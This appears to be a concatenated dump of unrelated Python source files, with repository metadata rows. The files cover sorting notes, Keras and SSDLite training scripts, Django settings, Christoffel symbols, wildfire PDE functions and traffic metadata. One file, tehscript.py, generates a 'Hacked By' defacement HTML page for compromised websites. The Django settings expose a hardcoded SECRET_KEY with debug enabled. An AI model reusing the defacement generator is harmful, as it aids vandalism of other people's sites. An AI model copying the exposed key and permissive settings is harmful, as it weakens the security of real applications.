	return (x < y) - (x > y)
result=sorted(list7,key=cmp_to_key(revsersed))
print('降序排列:',result)
#
# #面试中的常考题:sort和sorted的区别
# #sort排序会改变原来的list,而sorted排序只是对原有列表进行排序返回了一个新的经过排序之后的列表,并不会对原有列表进行改动。
# #sorted用于对一个序列进行排序。而sort只能用于列表的排序。
# #sort只是单纯的对列表进行内部排序,并没有返回值。
#
# print('*****************')
# list9=[9,5,3,8,7,1]
# print(list9)
# list9.sort()
# print(list9)
#
#
# print('****************')
# list10=[11,15,9,7,6]
# print(list10)
# print(sorted(list10))
# print(list10)
#
# test=(1,2,5,9,8)
# # test.sort()
# print(sorted(test))
#
#
#
| [
"1131057908@qq.com"
] | 1131057908@qq.com |
7fc7aff791a09b99186fbd863e81e975b037f8bf | af8c6011942e920703372c34b47254e4da423c55 | /aortaPy/lung-cancer-detector-master/resnet3d_101/trainval.py | ea62720b8a4861a570b8844600febbb063d13dc8 | [] | no_license | gfkd-xyu/xyu-code | 8aa1e4173a3086446d050ec2b125e4c79fd67dc6 | f4b067f236951ed43e7f801883bd1fcecb858f22 | refs/heads/master | 2021-07-07T02:32:39.153352 | 2020-07-27T07:01:19 | 2020-07-27T07:01:19 | 132,722,905 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,064 | py | """Train script
"""
from __future__ import (absolute_import, division,
print_function, unicode_literals)
import datetime
import requests
import argparse
import numpy as np
from keras.callbacks import (
ReduceLROnPlateau,
CSVLogger,
EarlyStopping,
ModelCheckpoint)
from keras.optimizers import Adam
from preprocessing.volume_image import (
VolumeImageDataGenerator)
from preprocessing.image_loader import (
NPYDataLoader)
from models.resnet3d import Resnet3DBuilder
import yaml
with open("init_args.yml", 'r') as stream:
    try:
        # NOTE(review): yaml.load without an explicit Loader can construct
        # arbitrary Python objects; yaml.safe_load is the usual choice for
        # a plain config file — confirm nothing relies on custom tags.
        init_args = yaml.load(stream)
    except yaml.YAMLError as exc:
        # NOTE(review): a parse error only prints here, leaving init_args
        # undefined so the script fails later with a NameError.
        print(exc)
# generate a random training title (docker-style name from a public service)
r = requests.get('https://frightanic.com/goodies_content/docker-names.php')
# raise_for_status() returns None and raises requests.HTTPError itself on
# 4xx/5xx, so the old `if r.raise_for_status(): raise` branch was dead code
# (and its bare `raise` would have been invalid outside an except block).
r.raise_for_status()
title = r.text.rstrip()
# parse a training title from the command line
parser = argparse.ArgumentParser(description='Continue a training.')
parser.add_argument('-t', help='The title of the training to continue')
args = parser.parse_args()
if args.t:
title = args.t
nb_classes = init_args['volume_image_data_generator']['train'][
'flow_from_loader']['nb_classes']
checkpointer = ModelCheckpoint(
filepath="output/resnet101_checkpoint_{}.h5".format(title),
verbose=1,
save_best_only=True)
lr_reducer = ReduceLROnPlateau(monitor='val_loss',
factor=np.sqrt(0.1),
cooldown=0,
patience=10, min_lr=1e-6)
early_stopper = EarlyStopping(monitor='val_loss',
min_delta=0.001,
patience=100)
csv_logger = CSVLogger(
'output/{}_{}.csv'.format(datetime.datetime.now().isoformat(), title))
train_datagen = VolumeImageDataGenerator(
**init_args['volume_image_data_generator']['train']['init'])
val_datagen = VolumeImageDataGenerator(
**init_args['volume_image_data_generator']['val']['init'])
train_vol_loader = NPYDataLoader(
**init_args['volume_image_data_loader']['train'])
val_vol_loader = NPYDataLoader(
**init_args['volume_image_data_loader']['val'])
train_iter_args = init_args['volume_image_data_generator']['train']['flow_from_loader']
train_iter_args['volume_image_data_loader'] = train_vol_loader
val_iter_args = init_args['volume_image_data_generator']['val']['flow_from_loader']
val_iter_args['volume_image_data_loader'] = val_vol_loader
image_shape = train_datagen.image_shape
model = Resnet3DBuilder.build_resnet_101(image_shape, nb_classes)
compile_args = init_args['model']['compile']
compile_args['optimizer'] = Adam(lr=1e-3)
model.compile(**compile_args)
model_fit_args = init_args['model']['fit_generator']
model_fit_args['generator'] = train_datagen.flow_from_loader(**train_iter_args)
model_fit_args['validation_data'] = val_datagen.flow_from_loader(
**val_iter_args)
model_fit_args['callbacks'] = [checkpointer, lr_reducer, early_stopper, csv_logger]
model.fit_generator(**model_fit_args)
model.save('output/resnet101_{}.h5'.format(title))
| [
"gfkd_yx@pku.edu.cn"
] | gfkd_yx@pku.edu.cn |
58f6541c17f821441c527340ba01b4d5c1e80583 | 51fa621d5b095ab41a338b4191e201f878a9e8db | /ss_project/settings.py | 5d1cec52a680cc264c16695897815c8deacb14e3 | [] | no_license | woshiwzy/ss_project | 5da6430530e5d3d1de524df0bf594161d31d9996 | fb7b92975f307ceaa1ba100db8fa060f53184bcc | refs/heads/master | 2020-03-19T06:41:34.891137 | 2018-07-09T14:10:18 | 2018-07-09T14:10:18 | 136,046,232 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,157 | py | """
Django settings for ss_project project.
Generated by 'django-admin startproject' using Django 1.11.13.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'ua5g*asvb20%n+nggr84=3da#&fl39d+hqdr4zmf#uk4qg96tc'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# NOTE(review): '*' accepts any Host header; pin this to the real
# hostnames before deploying outside local development.
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
"app_ss"
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'ss_project.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'ss_project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
AUTH_USER_MODEL = 'app_ss.User'
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
| [
"wzyfly@sina.com"
] | wzyfly@sina.com |
17aa41a4d34392c255c77bf534f4c854c422ba37 | 3375aa017a4db589614459e595565b6bb8f6ec41 | /modelLDA.py | c44087fc9a5aab25844e928517bb7432d80effc2 | [] | no_license | zmddzf/wandering_earth | bd1f8135852f2f1a72d2297a43a2935ed07d4246 | 1a1e29ac067b695e0fcb3b57b254825d9ee5a93d | refs/heads/master | 2020-04-22T00:10:49.144386 | 2019-02-10T11:18:47 | 2019-02-10T11:18:47 | 169,970,208 | 12 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,546 | py | # -*- coding: utf-8 -*-
"""
Created on Sat Feb 9 22:04:51 2019
@author: zmddzf
"""
import pandas as pd
from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer
from sklearn.decomposition import LatentDirichletAllocation
import jieba
import pyLDAvis
import pyLDAvis.sklearn
# 读取评论数据
hComments = []
with open('hComments.txt', 'r', encoding="utf-8") as f1:
for line in f1:
hComments.append(" ".join(jieba.cut(line)))
mComments = []
with open('mComments.txt', 'r', encoding="utf-8") as f2:
for line in f2:
mComments.append(" ".join(jieba.cut(line)))
lComments = []
with open('lComments.txt', 'r', encoding="utf-8") as f3:
for line in f3:
lComments.append(" ".join(jieba.cut(line)))
# 合并评论数据
comments = hComments + mComments + lComments
df = pd.DataFrame(comments)
# 关键词提取和向量转化
tfVectorizer = CountVectorizer(strip_accents = 'unicode',
max_features = 1000,
max_df = 0.5,
min_df = 10
)
tf = tfVectorizer.fit_transform(df[0])
# 初始化lda
lda = LatentDirichletAllocation(n_topics = 3,
max_iter =50,
learning_method = 'online',
learning_offset = 50,
random_state = 0)
lda.fit(tf) # 训练
# 可视化lda
data = pyLDAvis.sklearn.prepare(lda, tf, tfVectorizer)
pyLDAvis.show(data) | [
"35198228+zmddzf@users.noreply.github.com"
] | 35198228+zmddzf@users.noreply.github.com |
2a0f864a90d2c9af31adaade203406309f66c9d1 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_333/ch77_2020_04_13_15_29_15_904054.py | a10778292bfbe71d82aaf9be4a6d5a915023fc82 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 348 | py | import math
def calcula_tempo(dicionario):
    """Map each racer's name to the time computed from their acceleration.

    *dicionario* is iterated directly, so every element must be indexable
    as [0] -> name and [1] -> acceleration (e.g. a sequence of pairs).
    """
    tempos = {}
    for registro in dicionario:
        # registro[1] may arrive as a string; int() normalises it before
        # handing it to the physics helper.
        tempos[registro[0]] = aceleracao_tempo(int(registro[1]))
    return tempos
def aceleracao_tempo(a):
    """Return t = sqrt(200 / a), the time to travel 100 units from rest
    at constant acceleration *a* (from 100 = a * t**2 / 2)."""
    return math.sqrt(200 / a)
| [
"you@example.com"
] | you@example.com |
ae21355a947fa26186d70f23b068505b5b7e2275 | bf28104fcddede4caea403cc256a0bf695e953bd | /StreamLine/mainImports.py | 36a2412320e222659b018182a6081683902085ee | [] | no_license | edixon1/StreamLine | 76b4f4c0942faa75a70264b5e812993d9407d973 | 3e70a7cd1419e6f46cace5461f19a20b163a4fe6 | refs/heads/master | 2020-04-10T07:15:40.602406 | 2018-12-07T21:20:12 | 2018-12-07T21:20:12 | 160,876,417 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 599 | py | # -*- coding: utf-8 -*-
from kivy.app import App
from kivy.uix.boxlayout import BoxLayout
from kivy.properties import ObjectProperty
from kivy.uix.screenmanager import ScreenManager, Screen, FadeTransition
from kivy.lang import Builder
from kivy.uix.textinput import TextInput
from kivy.uix.listview import ListItemButton
import sqlite3
import os
from plyer import gps
from kivy.clock import Clock, mainthread
from kivy.uix.popup import Popup
from kivy.uix.label import Label
import gspread
import sqlite3
import os
from oauth2client.service_account import ServiceAccountCredentials | [
"noreply@github.com"
] | edixon1.noreply@github.com |
b19ead64eff4d47859f7a5e4e195d851e5aa0f2a | 76248f61de4008133e0f57e61be09fc6acc6bcbe | /relativipy/classes/01/Christoffel.py | b86bec96dcc9d7d9140c8cadcc7a289100f9fd4f | [] | no_license | gausstein/relativipy | dd4a5cae0aef28b6f8da8b7705ff644361890242 | 536b78c4d0efee94af1df4672e5376bffdde4c10 | refs/heads/master | 2016-09-16T14:18:03.240265 | 2011-03-11T20:51:28 | 2011-03-11T20:51:28 | 1,469,528 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 373 | py | # -*- coding: utf-8 -*-
from sympy import *
class Christoffel(object):
    """Christoffel symbols of the second kind for a 4-dimensional metric.

    *g* must expose g.uu(i, m) (inverse-metric components) and g.dd(m, k)
    (metric components with a .diff() method); *x* is the coordinate list.
    """
    def __init__(self, g, x):
        self.g = g
        self.x = x
    def udd(self, i, k, l):
        """Gamma^i_{kl} = 1/2 g^{im} (g_{mk,l} + g_{ml,k} - g_{kl,m})."""
        g, x = self.g, self.x
        total = 0
        for m in (0, 1, 2, 3):
            deriv = (g.dd(m, k).diff(x[l])
                     + g.dd(m, l).diff(x[k])
                     - g.dd(k, l).diff(x[m]))
            total += g.uu(i, m) / 2 * deriv
        return total
| [
"gausstein@gmail.com"
] | gausstein@gmail.com |
b0c7bff8cf1dad9863c32e34911316e8fa4be6c9 | 407818310342185f5cad9168f6f527599c01ef00 | /experiments/train.py | 8fbeabef7dbd029b89c95bf4992672f5effa1a10 | [] | no_license | liujiaming19910220/mobilenet_v2_ssdlite_keras | e1009c1bf16698b33ba5a323269defe2f8e93e86 | 778b73dfe85dc88dc436000f9e190b4925106514 | refs/heads/master | 2020-06-22T18:15:21.691949 | 2019-04-06T01:10:32 | 2019-04-06T01:10:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,969 | py | import os
import re
from keras.optimizers import Adam
from keras import backend as K
from models.keras_mobilenet_v2_ssdlite import mobilenet_v2_ssd
from losses.keras_ssd_loss import SSDLoss
from utils.object_detection_2d_data_generator import DataGenerator
from utils.object_detection_2d_geometric_ops import Resize
from utils.object_detection_2d_photometric_ops import ConvertTo3Channels
from utils.data_augmentation_chain_original_ssd import SSDDataAugmentation
from utils.coco import get_coco_category_maps
from utils.ssd_input_encoder import SSDInputEncoder
from keras.callbacks import TensorBoard, ModelCheckpoint, LearningRateScheduler
# model config
batch_size = 16
image_size = (300, 300, 3)
n_classes = 80
mode = 'training'
l2_regularization = 0.0005
min_scale = 0.1
max_scale = 0.9
scales = None
aspect_ratios_global = None
aspect_ratios_per_layer = [[1.0, 2.0, 0.5], [1.0, 2.0, 0.5, 3.0, 1.0 / 3.0], [1.0, 2.0, 0.5, 3.0, 1.0 / 3.0],
[1.0, 2.0, 0.5, 3.0, 1.0 / 3.0], [1.0, 2.0, 0.5], [1.0, 2.0, 0.5]]
two_boxes_for_ar1 = True
steps = None
offsets = None
clip_boxes = False
variances = [0.1, 0.1, 0.2, 0.2]
coords = 'centroids'
normalize_coords = True
subtract_mean = [123, 117, 104]
divide_by_stddev = 128
swap_channels = None
confidence_thresh = 0.01
iou_threshold = 0.45
top_k = 200
nms_max_output_size = 400
return_predictor_sizes = False
K.clear_session()
# file paths
train_images_dir = '/media/shishuai/C4742F9E742F926A/Resources/COCO/2017/train2017/'
train_annotations_filename = '/media/shishuai/C4742F9E742F926A/Resources/COCO/2017/annotations/instances_train2017.json'
val_images_dir = '/media/shishuai/C4742F9E742F926A/Resources/COCO/2017/val2017/'
val_annotations_filename = '/media/shishuai/C4742F9E742F926A/Resources/COCO/2017/annotations/instances_val2017.json'
log_dir = '/media/shishuai/C4742F9E742F926A/Resources/ssd_keras_logs/0320/'
# learning rate schedule
def lr_schedule(epoch):
    """Piecewise-constant learning rate: 1e-3 until epoch 200, 1e-4 until
    epoch 500, then 1e-5 (for Keras LearningRateScheduler)."""
    for boundary, rate in ((200, 0.001), (500, 0.0001)):
        if epoch < boundary:
            return rate
    return 0.00001
# set trainable layers
def set_trainable(layer_regex, keras_model=None, indent=0, verbose=1):
    """Freeze/unfreeze layers: only names fully matching *layer_regex* train.

    Recurses into nested Model layers (a multi-GPU wrapper keeps its
    weights on the inner model) and, for TimeDistributed wrappers, flips
    the wrapped layer instead. Layers without weights are skipped.
    """
    if hasattr(keras_model, "inner_model"):
        layers = keras_model.inner_model.layers
    else:
        layers = keras_model.layers
    for layer in layers:
        kind = layer.__class__.__name__
        if kind == 'Model':
            # Nested model: descend and let the recursion do the work.
            print("In model: ", layer.name)
            set_trainable(layer_regex, keras_model=layer)
            continue
        if not layer.weights:
            continue  # nothing to train here
        trainable = bool(re.fullmatch(layer_regex, layer.name))
        # TimeDistributed is a container: toggle the wrapped layer.
        target = layer.layer if kind == 'TimeDistributed' else layer
        target.trainable = trainable
        if trainable and verbose > 0:
            print("{}{:20} ({})".format(" " * indent, layer.name, kind))
# build model
model = mobilenet_v2_ssd(image_size, n_classes, mode, l2_regularization, min_scale, max_scale, scales,
aspect_ratios_global, aspect_ratios_per_layer, two_boxes_for_ar1, steps,
offsets, clip_boxes, variances, coords, normalize_coords, subtract_mean,
divide_by_stddev, swap_channels, confidence_thresh, iou_threshold, top_k,
nms_max_output_size, return_predictor_sizes)
# load weights
weights_path = '../pretrained_weights/ssdlite_coco_loss-4.8205_val_loss-4.1873.h5'
model.load_weights(weights_path, by_name=True)
# compile the model
adam = Adam(lr=0.001, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0)
ssd_loss = SSDLoss(neg_pos_ratio=3, alpha=1.0)
# set_trainable(r"(ssd\_[cls|box].*)", model)
model.compile(optimizer=adam, loss=ssd_loss.compute_loss)
print(model.summary())
# load data
train_dataset = DataGenerator(load_images_into_memory=False, hdf5_dataset_path=None)
val_dataset = DataGenerator(load_images_into_memory=False, hdf5_dataset_path=None)
train_dataset.parse_json(images_dirs=[train_images_dir], annotations_filenames=[train_annotations_filename],
ground_truth_available=True, include_classes='all', ret=False)
val_dataset.parse_json(images_dirs=[val_images_dir], annotations_filenames=[val_annotations_filename],
ground_truth_available=True, include_classes='all', ret=False)
# We need the `classes_to_cats` dictionary. Read the documentation of this function to understand why.
cats_to_classes, classes_to_cats, cats_to_names, classes_to_names = get_coco_category_maps(train_annotations_filename)
# set the image transformations for pre-processing and data augmentation options.
# For the training generator:
ssd_data_augmentation = SSDDataAugmentation(img_height=image_size[0],
img_width=image_size[1],
background=subtract_mean)
# For the validation generator:
convert_to_3_channels = ConvertTo3Channels()
resize = Resize(height=image_size[0], width=image_size[1])
# instantiate an encoder that can encode ground truth labels into the format needed by the SSD loss function.
# The encoder constructor needs the spatial dimensions of the model's predictor layers to create the anchor boxes.
predictor_sizes = [model.get_layer('ssd_cls1conv2_bn').output_shape[1:3],
model.get_layer('ssd_cls2conv2_bn').output_shape[1:3],
model.get_layer('ssd_cls3conv2_bn').output_shape[1:3],
model.get_layer('ssd_cls4conv2_bn').output_shape[1:3],
model.get_layer('ssd_cls5conv2_bn').output_shape[1:3],
model.get_layer('ssd_cls6conv2_bn').output_shape[1:3]]
ssd_input_encoder = SSDInputEncoder(img_height=image_size[0],
img_width=image_size[1],
n_classes=n_classes,
predictor_sizes=predictor_sizes,
scales=scales,
aspect_ratios_per_layer=aspect_ratios_per_layer,
two_boxes_for_ar1=two_boxes_for_ar1,
steps=steps,
offsets=offsets,
clip_boxes=clip_boxes,
variances=variances,
matching_type='multi',
pos_iou_threshold=0.5,
neg_iou_limit=0.3,
normalize_coords=normalize_coords)
# create the generator handles that will be passed to Keras' `fit_generator()` function.
train_generator = train_dataset.generate(batch_size=batch_size,
shuffle=True,
transformations=[ssd_data_augmentation],
label_encoder=ssd_input_encoder,
returns={'processed_images',
'encoded_labels'},
keep_images_without_gt=False)
val_generator = val_dataset.generate(batch_size=batch_size,
shuffle=False,
transformations=[convert_to_3_channels,
resize],
label_encoder=ssd_input_encoder,
returns={'processed_images',
'encoded_labels'},
keep_images_without_gt=False)
# Get the number of samples in the training and validations datasets.
train_dataset_size = train_dataset.get_dataset_size()
val_dataset_size = val_dataset.get_dataset_size()
print("Number of images in the training dataset:\t{:>6}".format(train_dataset_size))
print("Number of images in the validation dataset:\t{:>6}".format(val_dataset_size))
callbacks = [LearningRateScheduler(schedule=lr_schedule, verbose=1),
TensorBoard(log_dir=log_dir, histogram_freq=0, write_graph=True, write_images=False),
ModelCheckpoint(
os.path.join(log_dir, "ssdseg_coco_{epoch:02d}_loss-{loss:.4f}_val_loss-{val_loss:.4f}.h5"),
monitor='val_loss', verbose=1, save_best_only=True, save_weights_only=True)]
model.fit_generator(train_generator, epochs=1000, steps_per_epoch=1000,
callbacks=callbacks, validation_data=val_generator,
validation_steps=100, initial_epoch=0)
| [
"markshih91@gmail.com"
] | markshih91@gmail.com |
c25c569f0bf38ad85fb73361adee32bed0d3ee29 | a44834bf5c18a5c11ec701b6856b567e95b67ed6 | /tehscript.py | 7d044144accded60bf930ba16e1e67651a6e0638 | [] | no_license | teh-squadcyber/tehscript | 05fa2bc629250d1b6107add04ec1b4c1efd02087 | f62d52848fb5cad795c9b079c6f53f317338712e | refs/heads/master | 2020-06-17T08:47:59.805228 | 2020-03-16T06:20:59 | 2020-03-16T06:20:59 | 195,867,863 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,709 | py | #! usr/bin/python
#TEH SQUAD CYBER {CoDay#XploiT}
import os
import sys
def teh():
os.system ('clear')
teh = """\033[1;31;40m
/`\
/ : |
_.._ | '/
/` \ | / {SCRIPT DEFACE TEH v1}
| .-._ '-"` (
|_/ / o o\ - TEH SQUAD CYBER -
| = () )=
\ '--`/
/ ---<`
| , \\ INSTAGRAM :tehsquadcyber.id
| | \\__
/ ; |.__)
(_/.-. ;
{ `| \_/
'-\ / |
| / |
/ \ '-.
\__|----' """
teh2 = """\033[1;32;40m
/`\
/ : |
_.._ | '/
/` \ | / {SCRIPT DEFACE TEH v1}
| .-._ '-"` (
|_/ / o o\ - TEH SQUAD CYBER -
| = () )=
\ '--`/ copyright (c) Syntax7 - TSC2019
/ ---<`
| , \\ INSTAGRAM :tehsquadcyber.id >
| | \\__ GITHUB :https://github.com/TEHSquadCyber
/ ; |.__)
(_/.-. ;
{ `| \_/
'-\ / | [!] SUKSES MEMBUAT >
| / | [!] FILE NAME TEH404.html >
/ \ '-.
\__|----'"""
print teh
tehtit = raw_input ("\033[1;31;40m------[$]TITLE : ")
tehnik = raw_input ("\033[1;37;40m------[$]NICK : ")
tehtim = raw_input ("\033[1;31;40m------[$]TEAM : ")
tehmes = raw_input ("\033[1;37;40m------[$]PESAN : ")
tehkon = raw_input ("\033[1;31;40m------[$]EMAIL : ")
tehgrt = raw_input ("\033[1;37;40m------[$]GREET : ")
squad = open ("TEH404.html","w")
create1 = """<html>
<head>
<link rel="SHORTCUT ICON" href="http://dev-xmen.pantheonsite.io/wp-content/uploads/2017/08/2q3abk0.jpg" type="image/x-icon"/>
<meta content='Hacked By"""
create2 = tehnik
create3 = """' name='description'/><meta property="og:image" content="https://encrypted-tbn0.gstatic.com/images?q=tbn%3AANd9GcSJ17yapGqo79czdxUmWbokgbW6Psu8dMx3WW4oTT0wPWcq_g7L" />
<link href="https://upload.wikimedia.org/wikipedia/commons/thumb/a/a6/Anonymous_emblem.svg/1200px-Anonymous_emblem.svg.png" rel="shortcut icon" />
<body bgcolor="black"><title>"""
create4 = tehtit
create5 = """</title>
</style>
</head>
<div style="height: auto; min-height: 100%;">
<div style="text-align: center; width:800px; margin-left: -400px; position: absolute; top: 30%; left: 50%;">
<img src="https://4.top4top.net/p_1272yj2di0.gif">
<body>
<div align="center">
</div>
<div align="center">
<pre style="font: 50px/10px courier;"><b><br><br> <br><br><br><br><br>
<font color="white"> Hacked By <font color="red">"""
create6 = tehnik
create7 = """ </font>
</pre>
<pre style="font: 30px/10px courier;"><b>"""
create8 = tehtim
create9 = """</b></pre>
</div>
<div align="center">
<pre style="font: 20px/30px courier;"><b>"""
createa = tehmes
createb = """<i><div>
</b></pre>
</div>
<div align="center">
<pre>
<div style=?text-align:left;?>
~root@ Greetz : """
createc = tehgrt
created = """</div>
</pre>
<br> <b><font color="red" face="Ubuntu Mono" size="3"><i>Contact?<br> <font face="Ubuntu Mono" size="3" color="white"><i> """
createe = tehkon
createf = """<i> </font> </center><i><br>
<br> <b><font color="red" face="Ubuntu Mono" size="3"><i>INDONESIAN <font face="Ubuntu Mono" size="3" color="white"><i>HACKER RULEZ<i> </font> </center><i>
</pre>
</div>
</body>
</html>
<iframe width="0" height="0" src="https://2.top4top.net/m_1272o1x4o0.mp3" frameborder="0" allowfullscreen</iframe>"""
squad.write(create1)
squad.write(create2)
squad.write(create3)
squad.write(create4)
squad.write(create5)
squad.write(create6)
squad.write(create7)
squad.write(create8)
squad.write(create9)
squad.write(createa)
squad.write(createb)
squad.write(createc)
squad.write(created)
squad.write(createe)
squad.write(createf)
squad.close()
os.system ('clear')
os.system ('sleep 3')
print teh2
teh()
| [
"noreply@github.com"
] | teh-squadcyber.noreply@github.com |
99f2636f5ce820d99460c24b1d27351373900644 | f8716b6bff13bea3782480f3d2e5281d9931f970 | /wildfire/utils/functions.py | d941084b306f7da538557a350bab8c13baa9d260 | [
"BSD-3-Clause"
] | permissive | dsanmartin/ngen-kutral | 9e5af287a3a2f9a7dcb401397d3b8c98a2dc3c48 | 1024ec6a687dd673e7b38ed4f11588fa3a2eedf5 | refs/heads/master | 2022-12-06T01:53:33.824525 | 2022-11-29T05:21:13 | 2022-11-29T05:21:13 | 133,684,659 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 3,402 | py | """Functions utilities.
Some functions for implementation.
"""
import numpy as np
# Generic #
def G(x, y, s):
"""Gaussian kernel.
.. math::
G(x, y) = \exp(-(x^2 + y^2) / s)
Parameters
----------
x : float or array_like
x value.
y : float or array_like
y value.
s : float
Gaussian shape parameter.
Returns
-------
float or array_like
Gaussian function
"""
return np.exp(-(x ** 2 + y ** 2) / s)
# PDE FUNCTIONS #
def K(u, kap, eps):
"""Compute diffusion function
.. math::
K(u) = \kappa \, (1 + \varepsilon u)^3 + 1
Parameters
----------
u : array_like
Temperature variable.
kap : float
Diffusion parameter.
eps : float
Inverse of activation energy.
Returns
-------
array_like
Evaluation of K function.
"""
return kap * (1 + eps * u) ** 3 + 1
def Ku(u, kap, eps):
"""Derivative of K with respect to u.
.. math:
\dfrac{\partial K}{\partial u} = K_{u} = 3\,\varepsilon \kappa\, (1 + \varepsilon\, u)^2
Parameters
----------
u : array_like
Temperature variable.
kap : float
Diffusion parameter.
eps : float
Inverse of activation energy.
Returns
-------
array_like
Ku evaluation.
"""
return 3 * eps * kap * (1 + eps * u) ** 2
def f(u, b, eps, alp, s):
"""Temperature-fuel reaction function.
Parameters
----------
u : array_like
Temperature value.
b : array_like
Fuel value.
eps : float
Inverse of activation energy parameter.
alp : float
Natural convection parameter.
s : function or lambda
Step function.
Returns
-------
array_like
Reaction function.
"""
return s(u) * b * np.exp(u / (1 + eps * u)) - alp * u
def g(u, b, eps, q, s):
"""RHS of fuel PDE.
Parameters
----------
u : array_like
Temperature value
b : array_like
Fuel value.
eps : float
Inverse of activation energy parameter.
q : float
Reaction heat parameter.
s : function or lambda
Step function.
Returns
-------
array_like
Fuel RHS PDE.
"""
return -s(u) * (eps / q) * b * np.exp(u / (1 + eps * u))
def H(u, upc):
"""2D heaviside funcion
Parameters
----------
u : array_like
Temperature value
upc : float
Phase change threshold.
Returns
-------
array_like
Heaviside function evaluation.
"""
S = np.zeros_like(u)
S[u >= upc] = 1.0
return S
def sigmoid(u, k=.5):
"""Sigmoid function.
Parameters
----------
u : array_like
Temperature value.
k : float, optional
Slope constant factor, by default .5
Returns
-------
array_like
Sigmoid evaluation.
"""
return 1 / (1 + np.exp(-k * scale(u))) #0.5 * (1 + np.tanh(k * self.scale(u)))
def scale(u, a=-10, b=10):
"""Scale function.
Parameters
----------
u : array_like
Temperature value.
a : int, optional
Minimum value, by default -10
b : int, optional
Maximum value, by default 10
Returns
-------
array_like
Scaled value of u.
"""
return (b - a) * (u - np.min(u)) / (np.max(u) - np.min(u)) + a | [
"dsanmartinreyes@gmail.com"
] | dsanmartinreyes@gmail.com |
4cd128ca4c03ead4828afa4e0f796bf8d364ac49 | a1ee56f6c6dd23f4f9504300369b8f1824a51d40 | /1rdStep_getInfoNeighours.py | 7b53953e0840f87d1c793f88814825673b14b17b | [] | no_license | PENG-Tao-1985/test_git- | 10d35061cc3a78a1903495b7d496cf493daa839a | 53331fd0b4fc08b47966b7e1582004e4c4a8b90a | refs/heads/master | 2023-02-02T05:01:11.169006 | 2020-12-21T11:35:10 | 2020-12-21T11:35:10 | 323,331,871 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,310 | py | # -*- coding: utf-8 -*-
"""
本程序流程
1 读取 'trafficMetaData.csv' 文件
2 Traite函数负责将取得起始点,结束点之间均值
3 distance 计算两地之间距离
4 PointDeControleVille 根据所选城市,提取出此城市的观测点
5 TousLesVoisin 按照规则(距离,最小小邻居数目)获取本观测点和其邻居的信息
6 将5中结果存储在 'tousLesVoisinsDeTouslesPionts.npy'
"""
'''
本次关键参数:
'''
#fileDetrafficMetaData = 'trafficMetaData_simple.csv' #这是改过的,只含有11个观测点
fileDetrafficMetaData = 'trafficMetaData.csv'
villeChoisie = "Aarhus"
distanceEntreVoision = 1000
miniNumVoisin = 4
'''
读取 'trafficMetaData.csv' 文件
lecture de metadat de traffice
'''
import csv
metaDataTraffice = []
with open(fileDetrafficMetaData) as f:
f_csv = csv.reader(f)
headers = next(f_csv)
for row in f_csv:
metaDataTraffice.append(row)
'''
fonction Traite
将监测路段经度/纬度处理,从文本到浮点型可以接收的范围,然后算个均值
'''
def Traite(X,Y):
if len(X) >= 15:
X = X[0:16]
else:
for c in (0,16-len(X)):
X+"0"
if len(Y) >= 15:
Y = Y[0:16]
else:
for c in (0,16-len(Y)):
Y+"0"
return 0.5*(float(X)+float(Y))
'''
